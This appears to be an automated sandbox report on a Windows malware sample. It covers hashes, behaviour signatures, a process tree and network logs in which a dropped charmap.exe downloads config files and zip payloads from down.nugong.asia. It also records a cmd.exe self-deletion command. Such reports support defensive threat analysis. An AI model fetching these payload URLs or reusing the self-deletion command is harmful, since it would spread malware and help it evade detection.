Analysis

  • max time kernel
    150s
  • max time network
    149s
  • platform
    windows7_x64
  • resource
    win7-20231020-en
  • resource tags

    arch:x64, arch:x86, image:win7-20231020-en, locale:en-us, os:windows7-x64, system
  • submitted
    16/11/2023, 12:03 UTC

General

  • Target

    aadb797f5510dd51561246d61a1e5e1a6157590a248c7f4a8aac374ab0ac2d00.exe

  • Size

    2.0MB

  • MD5

    2f3353e9de4535e858254b2f9ebe0e70

  • SHA1

    beb0fe2c7a977abf0f292477466be291fca80a9a

  • SHA256

    aadb797f5510dd51561246d61a1e5e1a6157590a248c7f4a8aac374ab0ac2d00

  • SHA512

    909bb4cd1108fefed5bdf68af29eb0fbc5584f6c9ce7b7a15790af2c24ac2898ab132e7e95b7ba636c131c645e8aee95ef749dc24f7f05c2eb3808ab6c2146d7

  • SSDEEP

    49152:8Us4vWvQznXPwh11sXIAyT9tN93ul/lDxqqqoqqqdT:ls4iKXPs1sByTNT

Score: 10/10

Tags: upx

Malware Config

Signatures

  • Suspicious use of NtCreateUserProcessOtherParentProcess (2 IoCs)
  • Downloads MZ/PE file
  • Drops file in Drivers directory (3 IoCs)
  • Deletes itself (1 IoC)
  • Executes dropped EXE (2 IoCs)
  • UPX packed file (1 IoC)

    Detects executables packed with UPX/modified UPX open source packer.

  • Unexpected DNS network traffic destination (1 IoC)

    Network traffic to other servers than the configured DNS servers was detected on the DNS port.

  • Drops file in System32 directory (13 IoCs)
  • Drops file in Windows directory (1 IoC)
  • Enumerates physical storage devices (1 TTP)

    Attempts to interact with connected storage/optical drive(s).

  • Delays execution with timeout.exe (1 IoC)
  • Modifies data under HKEY_USERS (64 IoCs)
  • Modifies system certificate store (2 TTPs, 6 IoCs)
  • Suspicious behavior: EnumeratesProcesses (64 IoCs)
  • Suspicious behavior: GetForegroundWindowSpam (1 IoC)
  • Suspicious behavior: LoadsDriver (5 IoCs)
  • Suspicious use of AdjustPrivilegeToken (12 IoCs)
  • Suspicious use of WriteProcessMemory (30 IoCs)

Processes

  • C:\Windows\system32\winlogon.exe
    winlogon.exe
    1⤵
      PID:420
      • C:\ProgramData\autofmt.exe
        "C:\ProgramData\autofmt.exe"
        2⤵
        • Executes dropped EXE
        PID:2688
      • C:\charmap.exe
        "C:\charmap.exe"
        2⤵
        • Drops file in Drivers directory
        • Executes dropped EXE
        • Drops file in System32 directory
        • Drops file in Windows directory
        • Modifies data under HKEY_USERS
        • Modifies system certificate store
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2788
    • C:\Windows\Explorer.EXE
      C:\Windows\Explorer.EXE
      1⤵
      • Suspicious use of NtCreateUserProcessOtherParentProcess
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: GetForegroundWindowSpam
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1304
      • C:\Users\Admin\AppData\Local\Temp\aadb797f5510dd51561246d61a1e5e1a6157590a248c7f4a8aac374ab0ac2d00.exe
        "C:\Users\Admin\AppData\Local\Temp\aadb797f5510dd51561246d61a1e5e1a6157590a248c7f4a8aac374ab0ac2d00.exe"
        2⤵
        • Modifies system certificate store
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2512
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /c timeout /t 1 & del /Q /F "C:\Users\Admin\AppData\Local\Temp\aadb797f5510dd51561246d61a1e5e1a6157590a248c7f4a8aac374ab0ac2d00.exe"
          3⤵
          • Deletes itself
          • Suspicious use of WriteProcessMemory
          PID:692
          • C:\Windows\SysWOW64\timeout.exe
            timeout /t 1
            4⤵
            • Delays execution with timeout.exe
            PID:2880

Network

    • DNS [US]: 54e03c235962947852b3fe22714547f2.vbnm34567.xyz
      Process: aadb797f5510dd51561246d61a1e5e1a6157590a248c7f4a8aac374ab0ac2d00.exe
      Remote address: 8.8.8.8:53
      Request
      54e03c235962947852b3fe22714547f2.vbnm34567.xyz
      IN A
      Response
    • DNS [US]: down.nugong.asia
      Process: aadb797f5510dd51561246d61a1e5e1a6157590a248c7f4a8aac374ab0ac2d00.exe
      Remote address: 114.114.114.114:53
      Request
      down.nugong.asia
      IN A
      Response
      down.nugong.asia
      IN CNAME
      down.nugong.asia.cdn.dnsv1.com.cn
      down.nugong.asia.cdn.dnsv1.com.cn
      IN CNAME
      ofgk41rd.slt.sched.tdnsv8.com
    • GET [CN]: http://down.nugong.asia/cfg/cmc/ping.txt
      Process: charmap.exe
      Remote address: 119.167.229.212:80
      Request
      GET /cfg/cmc/ping.txt HTTP/1.1
      Host: down.nugong.asia
      Response
      HTTP/1.1 200 OK
      Last-Modified: Wed, 02 Nov 2022 09:53:56 GMT
      Etag: "bdf198e2733b39eae21f211114395f67"
      Content-Type: text/plain
      Date: Thu, 14 Sep 2023 14:23:31 GMT
      Server: tencent-cos
      x-cos-hash-crc64ecma: 3269775211629437622
      x-cos-meta-md5: bdf198e2733b39eae21f211114395f67
      x-cos-request-id: NjUwMzE3NjNfYTRmN2QxZV8yY2Q3M19mYzMzYTM=
      Content-Length: 16
      Accept-Ranges: bytes
      X-NWS-LOG-UUID: 7129195975271880907
      Connection: keep-alive
      X-Cache-Lookup: Cache Hit
    • GET [CN]: http://down.nugong.asia/cfg/cmc/ping.txt
      Process: charmap.exe
      Remote address: 119.167.229.212:80
      Request
      GET /cfg/cmc/ping.txt HTTP/1.1
      Host: down.nugong.asia
      Response
      HTTP/1.1 200 OK
      Last-Modified: Wed, 02 Nov 2022 09:53:56 GMT
      Etag: "bdf198e2733b39eae21f211114395f67"
      Content-Type: text/plain
      Date: Thu, 14 Sep 2023 14:23:31 GMT
      Server: tencent-cos
      x-cos-hash-crc64ecma: 3269775211629437622
      x-cos-meta-md5: bdf198e2733b39eae21f211114395f67
      x-cos-request-id: NjUwMzE3NjNfYTRmN2QxZV8yY2Q3M19mYzMzYTM=
      Content-Length: 16
      Accept-Ranges: bytes
      X-NWS-LOG-UUID: 7041402496685730997
      Connection: keep-alive
      X-Cache-Lookup: Cache Hit
    • GET [CN]: http://down.nugong.asia/cfg/cmc/userchange.txt
      Process: charmap.exe
      Remote address: 119.167.229.212:80
      Request
      GET /cfg/cmc/userchange.txt HTTP/1.1
      Host: down.nugong.asia
      Response
      HTTP/1.1 200 OK
      Last-Modified: Tue, 10 Oct 2023 09:19:13 GMT
      Etag: "fc45e837e3ce86dbec3d2c37cf4902de"
      Content-Type: text/plain
      Date: Tue, 10 Oct 2023 09:20:23 GMT
      Server: tencent-cos
      x-cos-hash-crc64ecma: 12006462995938776668
      x-cos-request-id: NjUyNTE3NTdfNGYyZmIwMDlfZWY3ZV82NGJlNTU2
      Content-Length: 80
      Accept-Ranges: bytes
      X-NWS-LOG-UUID: 1752883517681810299
      Connection: keep-alive
      X-Cache-Lookup: Cache Hit
    • GET [CN]: http://down.nugong.asia/cfg/cmc/userpq.zip
      Process: charmap.exe
      Remote address: 119.167.229.212:80
      Request
      GET /cfg/cmc/userpq.zip HTTP/1.1
      Host: down.nugong.asia
      Response
      HTTP/1.1 200 OK
      Last-Modified: Sun, 15 Oct 2023 12:14:07 GMT
      Etag: "adc490d0b07f1be911590c5b795aebea"
      Content-Type: application/zip
      Date: Sun, 15 Oct 2023 12:15:13 GMT
      Server: tencent-cos
      x-cos-hash-crc64ecma: 2623325120400499928
      x-cos-request-id: NjUyYmQ3ZDFfNjNlZjk4MWVfMTM2MGFfNDFmMzk2ZA==
      Content-Length: 14048
      Accept-Ranges: bytes
      X-NWS-LOG-UUID: 5713177746948184236
      Connection: keep-alive
      X-Cache-Lookup: Cache Hit
    • GET [CN]: http://down.nugong.asia/cfg/cmc/blacklist.txt
      Process: charmap.exe
      Remote address: 119.167.229.212:80
      Request
      GET /cfg/cmc/blacklist.txt HTTP/1.1
      Host: down.nugong.asia
      Response
      HTTP/1.1 200 OK
      Last-Modified: Tue, 14 Nov 2023 10:01:12 GMT
      Etag: "634229b217016f7ddbec9e50e2b2215a"
      Content-Type: text/plain
      Date: Tue, 14 Nov 2023 10:02:22 GMT
      Server: tencent-cos
      x-cos-hash-crc64ecma: 10822492973310145922
      x-cos-request-id: NjU1MzQ1YWVfZWM0Y2JlMDlfYzBhY182ZDkxNjY1
      Content-Length: 14128
      Accept-Ranges: bytes
      X-NWS-LOG-UUID: 11368800093448790513
      Connection: keep-alive
      X-Cache-Lookup: Cache Hit
    • GET [CN]: http://down.nugong.asia/cfg/user/c995ec7fd4f57c0d/a8f5d6fe5664609d.json
      Process: charmap.exe
      Remote address: 119.167.229.212:80
      Request
      GET /cfg/user/c995ec7fd4f57c0d/a8f5d6fe5664609d.json HTTP/1.1
      Host: down.nugong.asia
      Response
      HTTP/1.1 200 OK
      Last-Modified: Mon, 13 Nov 2023 05:36:53 GMT
      Etag: "20b0141db067e42fab5d126b516ce8fc"
      Content-Type: application/json
      Date: Mon, 13 Nov 2023 05:39:43 GMT
      Server: tencent-cos
      x-cos-hash-crc64ecma: 6759049951230011836
      x-cos-request-id: NjU1MWI2OWZfZDk5M2M1MDlfZDRkYl82YWU4ODgx
      Content-Length: 5536
      Accept-Ranges: bytes
      X-NWS-LOG-UUID: 11897375171845853590
      Connection: keep-alive
      X-Cache-Lookup: Cache Hit
    • GET [CN]: http://down.nugong.asia/cfg/pub/ms.json
      Process: charmap.exe
      Remote address: 119.167.229.212:80
      Request
      GET /cfg/pub/ms.json HTTP/1.1
      Host: down.nugong.asia
      Response
      HTTP/1.1 200 OK
      Last-Modified: Thu, 16 Nov 2023 11:55:58 GMT
      Etag: "90c471dc2bc4708513d3942620d62b50"
      Content-Type: application/json
      Date: Thu, 16 Nov 2023 11:58:51 GMT
      Server: tencent-cos
      x-cos-hash-crc64ecma: 85938580248757588
      x-cos-request-id: NjU1NjAzZmFfNjhlZTk4MWVfYjA4Y183N2JmY2Zl
      Content-Length: 70816
      Accept-Ranges: bytes
      X-NWS-LOG-UUID: 7949643104443966097
      Connection: keep-alive
      X-Cache-Lookup: Cache Hit
    • GET [CN]: http://down.nugong.asia/cfg/pub/ps.json
      Process: charmap.exe
      Remote address: 119.167.229.212:80
      Request
      GET /cfg/pub/ps.json HTTP/1.1
      Host: down.nugong.asia
      Response
      HTTP/1.1 200 OK
      Last-Modified: Thu, 16 Nov 2023 11:55:58 GMT
      Etag: "da98b3f975d47ac8f8c82c818e2918f0"
      Content-Type: application/json
      Date: Thu, 16 Nov 2023 11:58:56 GMT
      Server: tencent-cos
      x-cos-hash-crc64ecma: 17045325299171296767
      x-cos-request-id: NjU1NjA0MDBfYzMyNjgwOV8xMTZjXzk1OTU0OWE=
      Content-Length: 14496
      Accept-Ranges: bytes
      X-NWS-LOG-UUID: 16963553139638466009
      Connection: keep-alive
      X-Cache-Lookup: Cache Hit
    • GET [CN]: http://down.nugong.asia/pgm/mds/186dc678628340ee/90a22928787e3b5a341729d845ab26d5f93b9db0120714d864.zip
      Process: charmap.exe
      Remote address: 119.167.229.212:80
      Request
      GET /pgm/mds/186dc678628340ee/90a22928787e3b5a341729d845ab26d5f93b9db0120714d864.zip HTTP/1.1
      Host: down.nugong.asia
      User-Agent: CHM_MSDN
      Response
      HTTP/1.1 200 OK
      Last-Modified: Mon, 13 Nov 2023 05:36:32 GMT
      Etag: "a84b646b1d930ce01381ef358a7553eb"
      Content-Type: application/zip
      Date: Mon, 13 Nov 2023 05:37:42 GMT
      Server: tencent-cos
      x-cos-hash-crc64ecma: 15716088766820099200
      x-cos-request-id: NjU1MWI2MjZfNjMyNjgwOV8yZjdiXzcyNjM4ZWE=
      Content-Length: 776248
      Accept-Ranges: bytes
      X-NWS-LOG-UUID: 500760231856281183
      Connection: keep-alive
      X-Cache-Lookup: Cache Hit
    • GET [CN]: http://down.nugong.asia/pgm/mds/05631e93ccdb00ee/945f98f10df53a8f1cfb3848c371d6e3829473480dc6631564.zip
      Process: charmap.exe
      Remote address: 119.167.229.212:80
      Request
      GET /pgm/mds/05631e93ccdb00ee/945f98f10df53a8f1cfb3848c371d6e3829473480dc6631564.zip HTTP/1.1
      Host: down.nugong.asia
      User-Agent: CHM_MSDN
      Response
      HTTP/1.1 200 OK
      Last-Modified: Mon, 25 Sep 2023 10:33:25 GMT
      Etag: "8cea813a8866e2b77e93c2a847204979"
      Content-Type: application/zip
      Date: Sat, 21 Oct 2023 09:04:02 GMT
      Server: tencent-cos
      x-cos-hash-crc64ecma: 5924644156334808127
      x-cos-request-id: NjUzMzk0MDJfNWJlZDk4MWVfYmVkOV80Y2M2YjJi
      Content-Length: 553108
      Accept-Ranges: bytes
      X-NWS-LOG-UUID: 17693798271994959229
      Connection: keep-alive
      X-Cache-Lookup: Cache Hit
    • GET [CN]: http://down.nugong.asia/pgm/mds/006866ef1b75dc55/30d51089d778d32a4d22077fb983ba81fd82d4cf417ac62464.zip
      Process: charmap.exe
      Remote address: 119.167.229.212:80
      Request
      GET /pgm/mds/006866ef1b75dc55/30d51089d778d32a4d22077fb983ba81fd82d4cf417ac62464.zip HTTP/1.1
      Host: down.nugong.asia
      User-Agent: CHM_MSDN
      Response
      HTTP/1.1 200 OK
      Last-Modified: Fri, 18 Aug 2023 07:39:30 GMT
      Etag: "d3ee55c63ac9cfa7fd408553f9369f5b"
      Content-Type: application/zip
      Date: Fri, 18 Aug 2023 07:42:38 GMT
      Server: tencent-cos
      x-cos-hash-crc64ecma: 11311802544265698830
      x-cos-request-id: NjRkZjIwZWVfNTY1N2JiMDlfOGQ0Nl8zNGUyMDQ3
      Content-Length: 902517
      Accept-Ranges: bytes
      X-NWS-LOG-UUID: 1174372281419468057
      Connection: keep-alive
      X-Cache-Lookup: Cache Hit
    • GET [CN]: http://down.nugong.asia/cfg/cmc/Lander.txt
      Process: charmap.exe
      Remote address: 119.167.229.212:80
      Request
      GET /cfg/cmc/Lander.txt HTTP/1.1
      Host: down.nugong.asia
      Response
      HTTP/1.1 200 OK
      Last-Modified: Thu, 02 Nov 2023 08:54:14 GMT
      Etag: "2b0a274c713e2dbc2e5cbaeb685b7cb9"
      Content-Type: text/plain
      Date: Thu, 02 Nov 2023 08:57:25 GMT
      Server: tencent-cos
      x-cos-hash-crc64ecma: 5524331398157289202
      x-cos-request-id: NjU0MzY0NzVfY2E5ZjA4MDlfMWVjYV82MDE2NWI1
      Content-Length: 25440
      Accept-Ranges: bytes
      X-NWS-LOG-UUID: 12967380852860782898
      Connection: keep-alive
      X-Cache-Lookup: Cache Hit
    • GET [CN]: http://down.nugong.asia/cfg/cmc/psexe.txt
      Process: charmap.exe
      Remote address: 119.167.229.212:80
      Request
      GET /cfg/cmc/psexe.txt HTTP/1.1
      Host: down.nugong.asia
      Response
      HTTP/1.1 200 OK
      Last-Modified: Thu, 16 Nov 2023 10:21:48 GMT
      Etag: "bbf519b79b44c56a5e57f25e7c9c2b09"
      Content-Type: text/plain
      Date: Thu, 16 Nov 2023 10:22:59 GMT
      Server: tencent-cos
      x-cos-hash-crc64ecma: 3618226480165307532
      x-cos-request-id: NjU1NWVkODNfYTMzMjY4MDlfZTNlNl83NGY0NzVl
      Content-Length: 17552
      Accept-Ranges: bytes
      X-NWS-LOG-UUID: 13708709213316926661
      Connection: keep-alive
      X-Cache-Lookup: Cache Hit
    • GET [CN]: http://down.nugong.asia/cfg/cmc/urlmd5.json
      Process: charmap.exe
      Remote address: 119.167.229.212:80
      Request
      GET /cfg/cmc/urlmd5.json HTTP/1.1
      Host: down.nugong.asia
      Response
      HTTP/1.1 200 OK
      Last-Modified: Thu, 16 Nov 2023 11:59:51 GMT
      Etag: "af00c53c210fdf6c89a35e31fab90718"
      Content-Type: application/json
      Date: Thu, 16 Nov 2023 12:02:58 GMT
      Server: tencent-cos
      x-cos-hash-crc64ecma: 17454991016677689058
      x-cos-request-id: NjU1NjA0ZjJfNzljZDExMGJfMmYzNzhfZTM1MzcxZA==
      Content-Length: 656
      Accept-Ranges: bytes
      X-NWS-LOG-UUID: 7984560787863337585
      Connection: keep-alive
      X-Cache-Lookup: Cache Hit
    • DNS [US]: apps.game.qq.com
      Process: charmap.exe
      Remote address: 8.8.8.8:53
      Request
      apps.game.qq.com
      IN A
      Response
      apps.game.qq.com
      IN A
      101.227.134.49
      apps.game.qq.com
      IN A
      101.227.134.27
    • GET [CN]: https://apps.game.qq.com/comm-htdocs/ip/get_ip.php
      Process: charmap.exe
      Remote address: 101.227.134.49:443
      Request
      GET /comm-htdocs/ip/get_ip.php HTTP/1.1
      Accept-Encoding: gzip, deflate
      Host: apps.game.qq.com
      Connection: Close
      Response
      HTTP/1.1 200 OK
      Date: Thu, 16 Nov 2023 12:03:31 GMT
      Content-Type: text/html
      Content-Length: 49
      Connection: close
      Server: swoole-http-server
      Content-Encoding: gzip
    • DNS [US]: ocsp.trust-provider.cn
      Process: aadb797f5510dd51561246d61a1e5e1a6157590a248c7f4a8aac374ab0ac2d00.exe
      Remote address: 8.8.8.8:53
      Request
      ocsp.trust-provider.cn
      IN A
      Response
      ocsp.trust-provider.cn
      IN CNAME
      ocsp.trust-provider.cn.c.vedcdnlb.com
      ocsp.trust-provider.cn.c.vedcdnlb.com
      IN CNAME
      bd-l7-online-tob-oversea-opt.s.vedsalb.com
    • GET [CN]: http://ocsp.trust-provider.cn/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTRK6%2BKMEm7xEAA7oRlXypSzGx%2FAgQUyPPFCRszol%2BmEquQ1gC2XPyNHAYCEFeRTDpozwT3OxvpMIocpu0%3D
      Process: aadb797f5510dd51561246d61a1e5e1a6157590a248c7f4a8aac374ab0ac2d00.exe
      Remote address: 36.143.236.7:80
      Request
      GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBTRK6%2BKMEm7xEAA7oRlXypSzGx%2FAgQUyPPFCRszol%2BmEquQ1gC2XPyNHAYCEFeRTDpozwT3OxvpMIocpu0%3D HTTP/1.1
      Connection: Keep-Alive
      Accept: */*
      User-Agent: Microsoft-CryptoAPI/6.1
      Host: ocsp.trust-provider.cn
      Response
      HTTP/1.1 200 OK
      Server: volc-dcdn
      Content-Type: application/ocsp-response
      Content-Length: 599
      Connection: keep-alive
      Date: Thu, 16 Nov 2023 12:03:31 GMT
      Age: 1
      CF-Cache-Status: EXPIRED
      CF-RAY: 826669fd7cf5ce8c-SJC
      ETag: "5f2fef2f2105260951d9c24345a955796b1fd5d7"
      Expires: Wed, 22 Nov 2023 09:19:05 GMT
      Last-Modified: Wed, 15 Nov 2023 09:19:06 GMT
      WS-Cache-Status: 0
      X-CCACDN-Proxy-ID: scdpinlb4
      X-Frame-Options: SAMEORIGIN
      X-Via: 1.1 PS-CZX-01YIQ141:4 (Cdn Cache Server V2.0), 1.1 PS-PEK-01GFt24:12 (Cdn Cache Server V2.0)
      X-Ws-Request-Id: 655603c5_PS-PEK-01GFt24_25725-26234
      cache-via: cache.n173-145-133.bdcdn-hbcdcm02
      x-request-ip: 154.61.71.13
      x-tt-trace-tag: id=5
      x-dsa-trace-id: 17001362117a57cebda9528039b01ac55e0e39b8e3
      X-Bdsa-Cache-Status: HIT
      Cache-Via-Status: cache.n173-145-133.bdcdn-hbcdcm02(HIT)
      X-Bdsa-Cache-Tm: 1700135877-3266
      Accept-Ranges: bytes
      via: n173-145-133.bdcdn-hbcdcm02.ToB
      X-Dsa-Origin-Status: 200
      server-timing: cdn-cache;desc=HIT, origin;dur=0, edge;dur=0
    • DNS [US]: ocsp.digicert.cn
      Process: charmap.exe
      Remote address: 8.8.8.8:53
      Request
      ocsp.digicert.cn
      IN A
      Response
      ocsp.digicert.cn
      IN CNAME
      ocsp.digicert.cn.w.cdngslb.com
      ocsp.digicert.cn.w.cdngslb.com
      IN A
      47.246.48.205
    • GET [NL]: http://ocsp.digicert.cn/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAbJNRrm8KxusAb7DCqnMkE%3D
      Process: charmap.exe
      Remote address: 47.246.48.205:80
      Request
      GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAbJNRrm8KxusAb7DCqnMkE%3D HTTP/1.1
      Connection: Keep-Alive
      Accept: */*
      User-Agent: Microsoft-CryptoAPI/6.1
      Host: ocsp.digicert.cn
      Response
      HTTP/1.1 200 OK
      Server: Tengine
      Content-Type: application/ocsp-response
      Content-Length: 471
      Connection: keep-alive
      Cache-Control: max-age=7200
      Date: Thu, 16 Nov 2023 11:43:02 GMT
      Ali-Swift-Global-Savetime: 1700134982
      Via: cache2.l2de2[0,0,200-0,H], cache12.l2de2[0,0], cache5.nl2[0,0,200-0,H], cache7.nl2[1,0]
      Age: 1229
      X-Cache: HIT TCP_MEM_HIT dirn:1:348365936
      X-Swift-SaveTime: Thu, 16 Nov 2023 11:43:02 GMT
      X-Swift-CacheTime: 3600
      Timing-Allow-Origin: *
      EagleId: 2ff6309b17001362112167865e
    • GET [NL]: http://ocsp.digicert.cn/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQhnxEBNL9LgIhfSsTcHsrTt204QgQURNnISjOO01KNp5KUYR%2BayKW37MsCEAlZRMywkYGXHkcMpMgpr8c%3D
      Process: charmap.exe
      Remote address: 47.246.48.205:80
      Request
      GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBQhnxEBNL9LgIhfSsTcHsrTt204QgQURNnISjOO01KNp5KUYR%2BayKW37MsCEAlZRMywkYGXHkcMpMgpr8c%3D HTTP/1.1
      Connection: Keep-Alive
      Accept: */*
      User-Agent: Microsoft-CryptoAPI/6.1
      Host: ocsp.digicert.cn
      Response
      HTTP/1.1 200 OK
      Server: Tengine
      Content-Type: application/ocsp-response
      Content-Length: 471
      Connection: keep-alive
      Cache-Control: max-age=7200
      Date: Thu, 16 Nov 2023 11:43:25 GMT
      Ali-Swift-Global-Savetime: 1700135005
      Via: cache5.l2de2[14,14,200-0,M], cache4.l2de2[16,0], cache8.nl2[0,0,200-0,H], cache7.nl2[1,0]
      Age: 1206
      X-Cache: HIT TCP_MEM_HIT dirn:1:423183860
      X-Swift-SaveTime: Thu, 16 Nov 2023 11:43:25 GMT
      X-Swift-CacheTime: 3600
      Timing-Allow-Origin: *
      EagleId: 2ff6309b17001362113278050e
    • DNS [US]: sp1.baidu.com
      Process: charmap.exe
      Remote address: 8.8.8.8:53
      Request
      sp1.baidu.com
      IN A
      Response
      sp1.baidu.com
      IN CNAME
      www.a.shifen.com
      www.a.shifen.com
      IN CNAME
      www.wshifen.com
      www.wshifen.com
      IN A
      103.235.47.7
      www.wshifen.com
      IN A
      103.235.47.102
      www.wshifen.com
      IN A
      103.235.47.103
      www.wshifen.com
      IN A
      103.235.46.40
    • GET [HK]: https://sp1.baidu.com/8aQDcjqpAAV3otqbppnN2DJv/api.php?query=154.61.71.13&resource_id=6006&ie=utf8&oe=gbk&format=json
      Process: charmap.exe
      Remote address: 103.235.47.7:443
      Request
      GET /8aQDcjqpAAV3otqbppnN2DJv/api.php?query=154.61.71.13&resource_id=6006&ie=utf8&oe=gbk&format=json HTTP/1.1
      Accept-Encoding: gzip
      User-Agent: CHM_MSDN
      Host: sp1.baidu.com
      Cache-Control: no-cache
      Response
      HTTP/1.1 200 OK
      Cache-Control: private
      Content-Length: 354
      Content-Type: application/json;charset=gbk
      Date: Thu, 16 Nov 2023 12:03:47 GMT
      Expires: Thu, 16 Nov 2023 12:03:47 GMT
      P3p: CP=" OTI DSP COR IVA OUR IND COM "
      P3p: CP=" OTI DSP COR IVA OUR IND COM "
      Server: Apache
      Set-Cookie: BAIDUID=39C61BC447B3055DFAFABCC695373CB5:FG=1; expires=Fri, 15-Nov-24 12:03:47 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1
      Set-Cookie: BAIDUID=A028277FD5A679FD6E47394ADB1A61E6:FG=1; expires=Fri, 15-Nov-24 12:03:47 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1
      Tracecode: 02270995930429029386111620
      Tracecode: 02271004770274315530111620
      X-Powered-By: HHVM
    • DNS [US]: crl.globalsign.com
      Process: charmap.exe
      Remote address: 8.8.8.8:53
      Request
      crl.globalsign.com
      IN A
      Response
      crl.globalsign.com
      IN CNAME
      global.prd.cdn.globalsign.com
      global.prd.cdn.globalsign.com
      IN CNAME
      cdn.globalsigncdn.com.cdn.cloudflare.net
      cdn.globalsigncdn.com.cdn.cloudflare.net
      IN A
      104.18.20.226
      cdn.globalsigncdn.com.cdn.cloudflare.net
      IN A
      104.18.21.226
    • GET [US]: http://crl.globalsign.com/root-r3.crl
      Process: charmap.exe
      Remote address: 104.18.20.226:80
      Request
      GET /root-r3.crl HTTP/1.1
      Connection: Keep-Alive
      Accept: */*
      User-Agent: Microsoft-CryptoAPI/6.1
      Host: crl.globalsign.com
      Response
      HTTP/1.1 200 OK
      Date: Thu, 16 Nov 2023 12:03:42 GMT
      Content-Type: application/pkix-crl
      Content-Length: 2059
      Connection: keep-alive
      Last-Modified: Fri, 20 Oct 2023 00:00:00 GMT
      ETag: 3A
      Expires: Mon, 15 Jan 2024 00:00:00 GMT
      Cache-Control: public, no-transform, must-revalidate, s-maxage=3600
      CF-Cache-Status: HIT
      Age: 3266
      Accept-Ranges: bytes
      Server: cloudflare
      CF-RAY: 826f97a13a976657-AMS
    • GET [US]: http://ocsp2.globalsign.com/rootr3/ME4wTDBKMEgwRjAJBgUrDgMCGgUABBT1nGh%2FJBjWKnkPdZIzB1bqhelHBwQUj%2FBLf6guRSSuTVD6Y5qL3uLdG7wCDQHuXyId%2FGI71DM6hVc%3D
      Process: charmap.exe
      Remote address: 104.18.21.226:80
      Request
      GET /rootr3/ME4wTDBKMEgwRjAJBgUrDgMCGgUABBT1nGh%2FJBjWKnkPdZIzB1bqhelHBwQUj%2FBLf6guRSSuTVD6Y5qL3uLdG7wCDQHuXyId%2FGI71DM6hVc%3D HTTP/1.1
      Connection: Keep-Alive
      Accept: */*
      User-Agent: Microsoft-CryptoAPI/6.1
      Host: ocsp2.globalsign.com
      Response
      HTTP/1.1 200 OK
      Date: Thu, 16 Nov 2023 12:03:53 GMT
      Content-Type: application/ocsp-response
      Content-Length: 1431
      Connection: keep-alive
      Expires: Mon, 20 Nov 2023 09:48:46 GMT
      ETag: "b87def254cfbd1e1c7bbefdf93d58976a152baa5"
      Last-Modified: Thu, 16 Nov 2023 09:48:47 GMT
      Cache-Control: public, no-transform, must-revalidate, s-maxage=3600
      CF-Cache-Status: HIT
      Age: 2094
      Accept-Ranges: bytes
      Server: cloudflare
      CF-RAY: 826f97e64c3db96f-AMS
    • GET [CN]: http://down.nugong.asia/pgm/mds/b9aa4771a06003c1/4c3c71ab6fb06a3ec85c07a85e2af9e361998acec86eaa1e64.zip
      Process: charmap.exe
      Remote address: 119.167.229.212:80
      Request
      GET /pgm/mds/b9aa4771a06003c1/4c3c71ab6fb06a3ec85c07a85e2af9e361998acec86eaa1e64.zip HTTP/1.1
      Host: down.nugong.asia
      User-Agent: CHM_MSDN
      Response
      HTTP/1.1 200 OK
      Last-Modified: Tue, 10 Oct 2023 09:26:47 GMT
      Etag: "2984d7173c0ef353247c5882127b6dea"
      Content-Type: application/zip
      Date: Wed, 18 Oct 2023 02:37:24 GMT
      Server: tencent-cos
      x-cos-hash-crc64ecma: 4837415142414469027
      x-cos-request-id: NjUyZjQ0ZTRfMmVjYzExMGJfYzc0MV84OTBhYWE4
      Content-Length: 153522
      Accept-Ranges: bytes
      X-NWS-LOG-UUID: 2161620244003400841
      Connection: keep-alive
      X-Cache-Lookup: Cache Hit
    • GET [CN]: http://down.nugong.asia/pgm/mds/62761afc2f0d796a/2087d126bded15fb341729d845ab26d5124b01e56782ef7664.zip
      Process: charmap.exe
      Remote address: 119.167.229.212:80
      Request
      GET /pgm/mds/62761afc2f0d796a/2087d126bded15fb341729d845ab26d5124b01e56782ef7664.zip HTTP/1.1
      Host: down.nugong.asia
      User-Agent: CHM_MSDN
      Response
      HTTP/1.1 200 OK
      Last-Modified: Mon, 13 Nov 2023 05:36:13 GMT
      Etag: "33a70d7d11445ae0e98eea790c06fdd0"
      Content-Type: application/zip
      Date: Mon, 13 Nov 2023 05:39:21 GMT
      Server: tencent-cos
      x-cos-hash-crc64ecma: 17548609442877028985
      x-cos-request-id: NjU1MWI2ODlfYjczNTY4MDlfMWJhNV82YWQzNjc5
      Content-Length: 980299
      Accept-Ranges: bytes
      X-NWS-LOG-UUID: 1647302354324036148
      Connection: keep-alive
      X-Cache-Lookup: Cache Hit
    • GET [CN]: http://down.nugong.asia/pgm/mds/865609897d54b79b/502855f63d5364d77a01f5e8125b4fe59af4f34fd4851c3764.zip
      Process: charmap.exe
      Remote address: 119.167.229.212:80
      Request
      GET /pgm/mds/865609897d54b79b/502855f63d5364d77a01f5e8125b4fe59af4f34fd4851c3764.zip HTTP/1.1
      Host: down.nugong.asia
      User-Agent: CHM_MSDN
      Response
      HTTP/1.1 200 OK
      Last-Modified: Tue, 10 Oct 2023 09:27:24 GMT
      Etag: "c54f8dd4a616b44898e054837fe698bc"
      Content-Type: application/zip
      Date: Wed, 18 Oct 2023 02:37:24 GMT
      Server: tencent-cos
      x-cos-hash-crc64ecma: 11477013737684468114
      x-cos-request-id: NjUyZjQ0ZTRfYjQ5ZjA4MDlfYjc4M180NWFjN2M1
      Content-Length: 153529
      Accept-Ranges: bytes
      X-NWS-LOG-UUID: 16758888000343519892
      Connection: keep-alive
      X-Cache-Lookup: Cache Hit
